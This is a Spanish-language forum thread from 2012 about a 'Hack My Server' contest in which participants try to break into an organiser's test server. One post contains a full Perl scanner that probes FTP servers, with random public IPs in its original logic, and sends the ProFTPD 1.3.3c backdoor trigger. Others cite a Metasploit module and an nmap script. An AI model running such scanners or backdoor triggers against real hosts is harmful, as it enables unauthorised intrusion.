Concurso Nº1: "Hack My Server"

Iniciado por dimitrix, 25 Abril 2012, 00:40 AM

0 Miembros y 1 Visitante están viendo este tema.

adastra

el servicio  proftpd que esta instalado no es vulnerable.
Podéis probarlo con el script "bitchscan.pl" o directamente desde el modulo de metasploit "exploit/unix/ftp/proftpd_133c_backdoor"


Para los que querais probar el script, pongo el código
en la linea
$ip = "x.x.x.x";
poner la dirección que os han enviado por correo, el script encuentra que el servicio tiene la versión que es vulnerable, pero después de ejecutar, no es posible establecer el backdoor, indicando que el servicio no es "hackeable".


#!/usr/bin/perl
use IO::Socket;
## IP GENERATOR ##
print "\n! ProScan - Started !\n";

sub ipgen(){
my $range1 = 223;        #avoid experimental and multicast
my $range2 = 240;               
$oct1 = int(rand($range1)) + 1;        #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();        #if local or private call again
}else{
#$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
$ip = "x.x.x.x";
}
return $ip;        #return to caller       
}
##
## MAIN ##
while(1==1){        # keeps code running indefinatly
$target = &ipgen();        # get random ip to scan
print "SCANNING: $target \n";        # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '21',     
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 3 to be safe
                 );
if($sock){        # if socket opened (port open)

sysread($sock,$buf,1024);        # readheader - may need to make the buffer size 4096 instead of 1024
print "FTP SUCCESS: $target \n";                # print to screen
if ($buf =~ m/ProFTPD 1.3.3c/){
  print "\n!!Proftpd 1.3.3c Found!!\n";
  print $sock "HELP ACIDBITCHEZ\n";
  sysread($sock,$buf,1024);
  if ($buf =~ m/502/){
print "\n NOT HACKABLE \n";
  }else{
    print $buf;
  print "\n\n HACKABLE BOX FOUND \n\n";
          open (MYFILE, '>>proftpd_1.3.3c-exploitable.txt');
          print MYFILE "Proftp Found: $target :$buf\n";
  close(MYFILE);
}

}
}
close($sock);        # close the socket
}##

Once

Incluso con nmap:

nmap --script=ftp-proftpd-backdoor.nse <ip> <puerto>

Saldos!

$Edu$

Por fin pude!!!!





No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/

dimitrix

Cita de: $Edu$ en  2 Mayo 2012, 19:19 PM
Por fin pude!!!!
No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/

Todo servidor es hackeable, hace falta encontrar la vulnerabilidad.

El servidor no tiene ni firewall ni nada, no obstante si el día 15 (o mejor el 7) nadie consigue nada, iré bajando la seguridad.




Estoy pensando que por ahora la seguridad perimetral es quizás muy difícil para casi todos por lo que el mes que viene haré.
- Hack My Server: Joomla
- Hack My Server: WP




lokitorz

Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.

josezoft

Me puedes pasar la ip por privado :)

Saludos

Xenomorfo77

Hola señores, todavia no he mirado nada de esto, se sabe si hay alguna cuenta en el FTP? Buscando por la red encontre una vulnerabilidad para las versiones inferiores a la 1.3.3g. La vulnerabilidad se basa en enviar un comando inexistente o erroneo al servidor mientras se esta descargando o subiendo un archivo. La vulnerabilidad permitiria inyectar cogido arbitrario.

http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html

En ese link creado por mi teneis los scripts pero para uso local y necesitamos alguien con conocimientos en python para que lo pase a remoto, yo lo he intentado pero no tengo ni idea de python si alguien sabe que ponga la respuesta en el link. Un saludo y suerte.

h1t

Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente:
Servicio
22/tcp   open     ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)

voy a investigar un poco más sobre eso y a ver que sale.



: )

pajaras

me puedes enviar la IP?
mercii!

peib0l

quiero la ip ... manda-mela a @elhacker

me la suda el server yo solo quiero la cerveza, y lo sabes  :xD :xD soy un borracho jajaja